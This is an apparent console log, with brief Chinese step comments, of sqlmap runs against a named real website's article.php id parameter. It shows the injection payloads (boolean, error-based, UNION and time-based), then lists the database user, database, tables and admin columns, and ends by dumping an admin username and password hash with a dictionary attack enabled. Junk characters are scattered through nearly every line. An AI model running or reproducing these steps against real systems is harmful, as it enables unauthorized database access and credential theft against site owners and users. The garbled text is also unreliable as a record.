D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
/ I5 |9 \2 V1 v, z6 q$ |ms "Mysql" --current-user /* 注解:获取当前用户名称
, y2 x2 E% a6 u# y$ P3 L; c sqlmap/0.9 - automatic SQL injection and database takeover tool' X+ T" k9 u7 b
http://sqlmap.sourceforge.net starting at: 16:53:54
* j y7 L" r& y; j( Z/ U! ~[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
2 F4 k4 j& ]' \) A" u) b! ?( j session file# ~7 f: B, q& T1 ~9 X& [8 A
[16:53:54] [INFO] resuming injection data from session file
6 R. p. x: q4 ^4 g$ V# D[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file& d3 C6 K" |3 `7 O5 z: n
[16:53:54] [INFO] testing connection to the target url
' B3 b, s) a2 i# k2 [sqlmap identified the following injection points with a total of 0 HTTP(s) reque
: K- _7 `# u* wsts:+ z4 R; ?1 H$ T( W4 s0 N
---
: H4 O3 g/ i, D4 L) [: K2 e: e5 EPlace: GET
7 S1 z [; l, FParameter: id8 ~3 \7 h8 q1 [& B' e: W$ q
Type: boolean-based blind
; C$ O( H$ @4 p5 n8 F! P9 B, M9 q Title: AND boolean-based blind - WHERE or HAVING clause1 q# K! R2 F. d, M4 U: D
Payload: id=276 AND 799=799
! Z1 l# {4 _0 v& k Type: error-based
0 w# a2 V; X+ f# T- l Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 T( w' P* F3 p) y
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. A1 T- L6 m6 s9 N) I. h8 w& O
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
6 c/ W+ f' E+ M2 g! a),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)' a! s! p; J; e0 B
Type: UNION query; Y: W- S. t9 u# U
Title: MySQL UNION query (NULL) - 1 to 10 columns
3 {8 x- q7 U, Q8 Q' B Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) _2 _* A3 ^* G5 l(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),7 \6 m1 d% A" J! s% ]2 {% o
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#( d/ V0 [) ~) N( x
Type: AND/OR time-based blind
5 D9 N" h; ^& m: X+ F Title: MySQL > 5.0.11 AND time-based blind
" p$ r, K9 m/ l, G: M' ]! y$ G Payload: id=276 AND SLEEP(5)
2 U) l0 n" B( ]% ~8 V& ?" T---8 a* Z7 x& p8 E
[16:53:55] [INFO] the back-end DBMS is MySQL
: N* t h, @8 }web server operating system: Windows2 \3 R) i3 r1 L) w; |$ ~
web application technology: Apache 2.2.11, PHP 5.3.0& T2 d$ }2 |; k6 M* Z; b0 V4 w
back-end DBMS: MySQL 5.08 e. V7 k; l) }
[16:53:55] [INFO] fetching current user
/ c3 S% W a! Q" A) _! H6 g, r tcurrent user: 'root@localhost'
6 D) ?# O' `4 G9 C[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
; V2 S+ P& \4 h x8 ?% _8 }) dtput\www.wepost.com.hk' shutting down at: 16:53:587 h' E: m, m+ Q
4 j5 O& f0 X: KD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
5 `. u; U& ?+ V* V; O, |% h( Bms "Mysql" --current-db /*当前数据库& {8 r( R# c8 t1 F+ h
sqlmap/0.9 - automatic SQL injection and database takeover tool2 ^3 ^4 k" n. U% `/ b, Q% h6 ?; q/ F
http://sqlmap.sourceforge.net starting at: 16:54:16+ |. n1 z+ E( e7 ^) F
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
, |4 p. p- X7 F: n3 l$ l! K session file
# ~4 Y+ t! ?2 v" ?[16:54:16] [INFO] resuming injection data from session file
/ V+ x. a+ M* o. e[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
4 p6 _2 \/ L1 }- O# b- K6 w/ Q[16:54:16] [INFO] testing connection to the target url
& U9 J+ i7 _+ Z5 _+ Y8 Isqlmap identified the following injection points with a total of 0 HTTP(s) reque2 U: J, |$ x4 P* t. u+ T9 A
sts:: ~7 r+ J6 B( ?2 ?' N) Z( X
---, J! f# h' d, G: [4 o1 y/ e
Place: GET$ T: c' m$ L/ }' ]
Parameter: id4 u1 U7 Y& A) r. R
Type: boolean-based blind* k- l$ U( V" Z+ `; [4 t( |# n
Title: AND boolean-based blind - WHERE or HAVING clause# \- G( e+ Y( U% Y. L6 }- W# i& T
Payload: id=276 AND 799=799! h M5 ?8 Z# m
Type: error-based
( C- A1 \' W! d: Y; w: r( j Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause2 _' ^4 G+ T, h, a0 ^
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' w6 S0 t6 w0 R b0 j120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
- U# Y3 J0 ]* L: ]2 l),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
" }9 S2 g; y7 S6 h Type: UNION query
" ]( X" ~- `: T. v5 k0 O9 w Title: MySQL UNION query (NULL) - 1 to 10 columns
8 Q, S0 X, w& [ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! _ i) i0 e+ Q' |7 ], t7 r! c(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), G$ F. c" P! k0 L. _1 }
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#9 T! j) ?7 D+ r* D5 S i% V6 A
Type: AND/OR time-based blind* j+ g P* Y* F5 E6 _' J- j/ g
Title: MySQL > 5.0.11 AND time-based blind; H* n% Y2 e2 w. n! x
Payload: id=276 AND SLEEP(5)& |7 m* z& J! o7 Q0 P
---
# x" O4 v& n7 k; x* b% l6 ?[16:54:17] [INFO] the back-end DBMS is MySQL
2 c% x2 Q+ i* z1 A ~: f6 f7 Jweb server operating system: Windows' [) N# q* t1 v2 E: I$ T. G7 i/ `7 h
web application technology: Apache 2.2.11, PHP 5.3.0. x8 P, F U4 u. f! P4 I
back-end DBMS: MySQL 5.0
- V4 m5 o4 I, C9 r[16:54:17] [INFO] fetching current database
6 m4 R% j0 q- Bcurrent database: 'wepost'# d' Q; t; L P0 H" G4 l
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
3 d! r9 o2 D* ~" N- H" _9 I2 m% @tput\www.wepost.com.hk' shutting down at: 16:54:18
) _0 v. x: f* z# Y; L" ~3 tD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
( {& y" p% n/ w) d5 rms "Mysql" --tables -D "wepost" /*获取当前数据库的表名* |: Y" n- p* b; w/ @
sqlmap/0.9 - automatic SQL injection and database takeover tool
& |. y7 U z f' b- y* @0 F http://sqlmap.sourceforge.net starting at: 16:55:25+ {4 S2 \# P D$ J
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as, J2 l# d) [4 G) W% Q6 E
session file$ O/ u, U0 a8 C; a7 e
[16:55:25] [INFO] resuming injection data from session file
; h: K. {4 k6 k( C" m7 }[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
7 p9 J, ]7 z8 W' e[16:55:25] [INFO] testing connection to the target url4 N% n3 I% q/ j* ], A( s' O" B1 Q2 _
sqlmap identified the following injection points with a total of 0 HTTP(s) reque. u. P( c6 y6 }3 \9 |' n3 d5 Z
sts:
1 c* x: b# W8 ~. p6 G' P5 p---1 R) O+ t ~7 ^1 L
Place: GET# J1 W0 V* o4 }; Z
Parameter: id
0 X ~1 w+ f6 t% \2 r; f Type: boolean-based blind: W+ l& a! X2 [' t5 z- Z9 ^) a+ |
Title: AND boolean-based blind - WHERE or HAVING clause7 w ~) } {/ j$ F, v" {: G" j
Payload: id=276 AND 799=7991 u7 k, B7 m9 ^+ o% @4 v# {
Type: error-based
$ g- L, l* e# E1 |7 ` Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! F0 O* U' W$ a9 i# x( ~
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,5 H. \, L: e$ t% C2 }' N3 S
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
: f, y5 s2 W2 ~9 R0 U3 F7 j),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a): L% h |( t1 H1 t$ e+ [ j
Type: UNION query$ @/ {7 Y$ @. ]2 u2 ]+ a' ]" `
Title: MySQL UNION query (NULL) - 1 to 10 columns4 I# v' ^5 ~5 h) [( o
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! d3 X; ], n. d4 g+ S# Z* p(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ W0 i& H0 ~% S) `1 xCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
! N7 T; T( M. b( @) g Type: AND/OR time-based blind( R& L9 J; f) J$ k0 `- `* @
Title: MySQL > 5.0.11 AND time-based blind- D4 V' ?3 V7 b
Payload: id=276 AND SLEEP(5)1 @; B& _6 E+ _0 W8 u1 m# g& B
---
( }8 h9 W H e" E2 U( K- {[16:55:26] [INFO] the back-end DBMS is MySQL
7 {' a8 f B: d2 R0 x0 V5 }web server operating system: Windows& K- ?. V" U3 {, m* c8 `
web application technology: Apache 2.2.11, PHP 5.3.03 ?6 |8 y' O, P) L- J, s) v
back-end DBMS: MySQL 5.0
$ S, C& K- Q0 g( \+ m9 k[16:55:26] [INFO] fetching tables for database 'wepost'
! a; T2 X7 u7 K) g. m5 \[16:55:27] [INFO] the SQL query used returns 6 entries$ A6 g: f5 B1 A
Database: wepost3 O! C; X# B* ]% o/ n8 ]6 [2 B
[6 tables]
+ {$ m* q7 l* K5 l# U4 E+-------------+! d6 u1 _) K- w |, m( F$ `
| admin |* w# k' }. k: W D$ P
| article |
* |8 _# M: m, d) ]( o| contributor |/ _0 x, p8 a+ N. O' p
| idea |
+ J7 P* Q. C% E# {0 ?1 ^| image |% _3 }' H7 \& P- J
| issue |9 F7 j- x9 y; O: F
+-------------+" V9 r8 h: {2 G* }; o
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou- s& [* @) y1 d0 z$ V
tput\www.wepost.com.hk' shutting down at: 16:55:33$ N! z+ D) Q3 H) ~+ v7 N
! j$ [9 F* ~1 g9 c, o0 a! d# E
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
* S7 M! `) P$ \8 ?, Q2 wms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
! @& J. h, v# H" | sqlmap/0.9 - automatic SQL injection and database takeover tool* [# F0 V9 @/ V/ z
http://sqlmap.sourceforge.net starting at: 16:56:06' A2 Y/ z9 n& N# h4 o0 u. @3 F
sqlmap identified the following injection points with a total of 0 HTTP(s) reque) a/ A" b0 B/ {" b G
sts:6 H2 J+ A* d' C& [8 Y- j4 c& g
---
; H' d7 L; F% D9 q$ o( NPlace: GET: i, O; n6 K: i3 Q4 w1 r9 B
Parameter: id
: e6 ~1 K; |4 ^9 Q6 h& L, [ Type: boolean-based blind$ W/ o- Y! ~0 q+ N, d
Title: AND boolean-based blind - WHERE or HAVING clause
8 O$ R5 y& M/ \! ?0 J8 s Payload: id=276 AND 799=799
# N. F& F3 y7 \9 _ Type: error-based
2 C% v7 F7 f4 ] Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause3 a& y4 ^8 I' K6 e
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,# t" B, B/ C7 B- W
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
+ _5 J6 C9 i6 m+ X2 P),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- ]; H( P) S( U1 J8 ~5 ~( L* U Type: UNION query$ ]3 r" L' {% A+ C
Title: MySQL UNION query (NULL) - 1 to 10 columns
6 @' D+ O; i, j6 K+ L& H( c Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR" D" W* M; @) b8 p0 m8 P8 [& j) U
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( G- V7 U* x9 x$ \, J3 j: Q
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#$ j o( s ^, W6 E( {# e0 h
Type: AND/OR time-based blind C( i D; d, d" @
Title: MySQL > 5.0.11 AND time-based blind
3 r. ~# h3 t+ W' d+ Q* }% i Payload: id=276 AND SLEEP(5)
3 C# r2 E; }; ^/ [! p! _1 [1 D---/ }. p) \' R; O5 k9 @+ o1 |: m
web server operating system: Windows R, C/ v3 T& m+ H, `; r
web application technology: Apache 2.2.11, PHP 5.3.0) |1 U8 q9 ]( }. f6 X! O
back-end DBMS: MySQL 5.0* r& Q8 E& Y$ t/ l
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
9 m* I3 ^; `1 `3 @$ U _ssion': wepost, wepost6 _/ o8 m; H% F0 E2 r
Database: wepost+ C3 q1 a% ?( u
Table: admin
2 ]5 z) `/ x5 G" o! }[4 columns]
, F! y) H$ t6 I6 b' M+----------+-------------+
0 j5 x% p) c" A) i. P| Column | Type |7 W, o$ X; L* N. P% W; h
+----------+-------------+
) v$ M' n {* f| id | int(11) |6 G; T% `; p4 a* D- z6 G% f
| password | varchar(32) |
. W2 k, H2 z) v* `| type | varchar(10) |
! ~# m" J. R; a( W7 s| userid | varchar(20) |0 Q: s0 R. g$ v* C2 T1 j/ W: I
+----------+-------------+/ ?0 R& g& d; }7 j- N
shutting down at: 16:56:19
1 [( ^( e8 R3 a
+ ]. s, R1 Q7 T n3 W$ H2 {* HD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ ?2 w- W' `# P, g5 O
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
0 C$ B- G- A+ o8 \9 ^- t7 t sqlmap/0.9 - automatic SQL injection and database takeover tool
: k7 ]5 R% y& d; D http://sqlmap.sourceforge.net starting at: 16:57:14 f/ w8 X6 [% W! ~! D+ g9 W
sqlmap identified the following injection points with a total of 0 HTTP(s) reque( T2 Q& C9 Y% f. N9 O
sts:
- {* R B' c8 b# A---9 U/ q3 _1 a, e2 i
Place: GET/ X* b# m% V9 G
Parameter: id% U9 {2 r# U& N! ?
Type: boolean-based blind0 Q" J1 c |1 u) b. F, Q
Title: AND boolean-based blind - WHERE or HAVING clause
( d1 S/ ~1 r+ r+ P& x3 [/ V$ H Payload: id=276 AND 799=799. C7 b, Y5 n% p$ Y+ x' G
Type: error-based
( R% k; R! e( F6 T9 { Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause- {8 D# d' b1 ]# Q; D: A
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, C: S7 L# d8 r; E* C* a8 `
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
! k% c) Z2 I h5 p' E& i& t4 ^),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a), y$ c$ } L/ H3 d3 e
Type: UNION query
# ]4 q' Q6 d4 S: K Title: MySQL UNION query (NULL) - 1 to 10 columns0 i2 V' h( D, m M1 v% C
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR% e7 U. \" i4 T [2 L _& W, l3 o: s
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),9 _2 m" q1 T/ r% ? `; m
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
# H* `4 q& X$ J7 U Type: AND/OR time-based blind
1 Y! W& S3 M9 O2 \+ @0 x# V Title: MySQL > 5.0.11 AND time-based blind) g5 X, z4 ?1 F' a) M* g
Payload: id=276 AND SLEEP(5)
9 o1 _% z5 R: S3 y p @---/ ^" v4 N& b" s. K- p- ^. S
web server operating system: Windows4 m9 S( D# Q i
web application technology: Apache 2.2.11, PHP 5.3.0% `0 z6 X$ k$ H* R. i
back-end DBMS: MySQL 5.0% z; M9 x. R2 a* K4 W. C
recognized possible password hash values. do you want to use dictionary attack o
' B) m5 I2 P! e' \2 t+ G" J3 w. mn retrieved table items? [Y/n/q] y- B @. X9 T3 o5 L1 S/ \; L
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]# n2 ~% T4 z( S) |& w0 N" Z( H* p
do you want to use common password suffixes? (slow!) [y/N] y
" Y) @8 N3 t3 ~" q5 K9 E0 kDatabase: wepost
% B; q: Z( U1 vTable: admin) d" u2 b, w$ d, o' f
[1 entry]$ M/ j$ R3 o: B2 \2 P, V0 }
+----------------------------------+------------+
3 R% C* m& s1 v0 {" M3 G1 `5 }; h: L| password | userid |' `4 |8 U/ D7 [' R
+----------------------------------+------------+( H) F! u$ |8 e$ p8 {& n
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |* G6 L& \; r& v& E# j) h6 n
+----------------------------------+------------+1 J( j4 n) F! u% N9 C
shutting down at: 16:58:14
& C" Q+ G& J) U; f0 e8 ?6 V: z* q9 f6 B3 r
D:\Python27\sqlmap> |